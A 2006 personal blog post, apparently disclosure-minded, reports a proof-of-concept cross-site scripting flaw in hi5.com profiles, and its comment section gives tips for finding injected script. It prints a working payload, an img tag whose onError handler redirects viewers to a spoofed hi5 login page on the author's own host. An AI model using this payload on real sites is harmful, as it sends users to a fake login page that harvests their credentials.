start > 2006-01-15 > 1
Hi5 and XSS Part II
labels
| Category: | security |
Hi5 and XSS Part II 
Well I've just written a proof of concept on 
my hi5.com profile. You need a valid login! While loading my profile, you'll auto-magically be redirected to a spoofed hi5.com page at my webserver, I won't save the information you input, but I suggest you to enter only testing info to try it out!For the interested the proof of concept is the following:
<img src="" onError="location.replace('http://pabrantes.dyndns.org/www.hi5.com/friend/displayMyProfile.html');">
Since no image will be loaded an onError event will be generated, and automatically the user will be re-asked to relogin, but in the fake page! Since it's not unusual to be asked to relogin at hi5.com there's a potential danger for users to disclosure their information!
Who am I?
My name is Paulo Abrantes AKA pabrantes and I'm a software developer. I'm currently employed at CIIST working as a Java developer in FenixEDU.This blog is mostly about Java programming, domain driven design and snipsnap bliki developing. Everything written in this blog is my personal opinion and it may not reflect the opinions of my employer and co-workers.
Blog subscription
My name is Paulo Abrantes AKA pabrantes and I'm a software developer. I'm currently employed at CIIST working as a Java developer in FenixEDU.This blog is mostly about Java programming, domain driven design and snipsnap bliki developing. Everything written in this blog is my personal opinion and it may not reflect the opinions of my employer and co-workers.
Blog subscription
Links
Home
Paulo's Profile
Post History
Add to Technorati Favorites
Paulo's Photo Gallery
WishList
Posting without Login
Lon3wolf's Blog
MANOWAR's Blog
Max's Blog
Jff's Blog
João Ferreira's Blog
Moon's Blog
Rui's Movie
Blog
Balhau's Blog
Recent PostsJava Programming: Bytecode Injection
Intermission: Sorry For Downtime
Software Developing: Studying The Bliki Domain Model
SnipSnap Developing: Trying to settle a roadmap
System Administration: Load Balancing with Apache
Blogging: Two years have passed
Software Developing: The SnipSnap Saga
Java Programming: Getting your code spicy with Groovy
Software Developing: Fluent Interfaces
Software Developing: Implementing a ShoutBox on SnipsSnip
Software Developing: SnipSnap, SnipIt and SnipSnip
Java Programming: Proxies and Access Control
Java Programming: Proxies and References
Java Programming: References' Package
YALM: Yet Another Layout Modification
For older posts, please refer to post-history for a complete Post History
… and 5 Guests.
Home Paulo's Profile Post History Add to Technorati Favorites Paulo's Photo Gallery WishList Posting without LoginSearch Blog
Fellow Bloggers
Lon3wolf's Blog MANOWAR's Blog Max's Blog Jff's Blog João Ferreira's Blog Moon's Blog Rui's Movie
Blog Balhau's BlogIntermission: Sorry For Downtime
Software Developing: Studying The Bliki Domain Model
SnipSnap Developing: Trying to settle a roadmap
System Administration: Load Balancing with Apache
Blogging: Two years have passed
Software Developing: The SnipSnap Saga
Java Programming: Getting your code spicy with Groovy
Software Developing: Fluent Interfaces
Software Developing: Implementing a ShoutBox on SnipsSnip
Software Developing: SnipSnap, SnipIt and SnipSnip
Java Programming: Proxies and Access Control
Java Programming: Proxies and References
Java Programming: References' Package
YALM: Yet Another Layout Modification
For older posts, please refer to post-history for a complete Post History
Recently Changed
Software Developing: SnipSnap, SnipIt and SnipSnip (enricod)- Software Developing: SnipSnap, SnipIt and SnipSnip (pabrantes)
- Software Developing: SnipSnap, SnipIt and SnipSnip (enricod)
enricod- beautisgift01@yahoo.com
- Java Programming: Bytecode Injection (pabrantes)
- Java Programming: Bytecode Injection (m4ktub)
- Java Programming: Bytecode Injection (pabrantes)
- Java Programming: Bytecode Injection (m4ktub)
Java Programming: Bytecode Injection
Logged in Users: (0)
I've sent you an email. But since people can find this post, I'll reply it here also.The attack I've described was a XSS (cross site scripting) attack that you would deploy on your page and affect others that would look your profile. Having your profile changed due to seeing someone's profile, it's a bit more extreme because it would have to do the following:
- identify your user well that might not be dificult
- be able to submit some code of their own as you, this can be a problem. Since the submissions don't go stored in the URL but in the HTTP Header.
Although I'm not saying it's not possible, I'm gonna look into it a bit. Or could be another totally different problem.But somehow if it was a script injection on your page here are the tips to see if you can get your profile back:- go to your web browsers preferences and disable javascript
- enter your hi5 profile
- select My profile and then edit
- Check the fields who support HTML and look for strange things you haven't written there.
Also if you find anything please copy/paste and send them back via email or post it here. I would be interested in seeing that.Best regards,Paulo Abrantes